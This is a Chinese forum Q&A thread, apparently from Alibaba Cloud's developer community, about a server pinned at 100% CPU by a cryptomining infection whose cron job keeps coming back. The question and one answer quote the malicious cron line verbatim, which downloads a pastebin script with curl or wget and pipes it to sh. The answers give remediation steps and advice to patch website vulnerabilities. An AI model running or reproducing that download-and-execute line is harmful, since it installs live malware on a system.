服务器CPU100%,后台有个定时任务一直删除不掉;挖矿病毒;
后台有个定时任务一直删除不掉;如何处理,需要紧急回复!
[root@iz2ze46125tswrsd088ycrz bin]# crontab -l
*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
##
展开
收起
3
条回答
写回答
写回答
-
喜欢智慧创造的过程服务器应该是通过网站漏洞上传了脚本木马并提权拿到了服务器权限执行了挖矿木马导致cpu百分之100,服务器一般都是网站存在漏洞,被黑客利用并提权入侵的,导致服务器中木马,网站被挂黑链,被篡改,被挂马。解决办法:检查可疑进程 关闭不用的端口,下载360杀毒进行全盘扫描,主要问题还是网站有漏洞导致被上传了木马后门,如果自己懂程序,那就可以自己针对代码的漏洞进行漏洞修复,不懂的话,就请专业的网站安全公司来完善一下程序上的某些代码漏洞,国内像SINE安全、绿盟安全、启明星辰都是比较专业的安全公司,很多黑客之所以能植入木马病毒,就是抓住了这些网站代码上的漏洞。2018-11-24 10:10:30赞同 1 展开评论 打赏 -
###清除/etc/ld.so.preload的内容[root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload### 删除/usr/local/lib/lib/libdns.so文件[root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so### 删除定时任务[root@SJ-pre-release ~]# cat /var/spool/cron/root*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh##[root@SJ-pre-release ~]# rm -rf /var/spool/cron/root[root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root*/31 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh##[root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root再次查看进程,发现有一个kworkerds,这个就是挖坑程序
2018-10-19 11:25:29赞同 3 展开评论 打赏 -
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
相关问答
问答排行榜
最热
最新
推荐问答
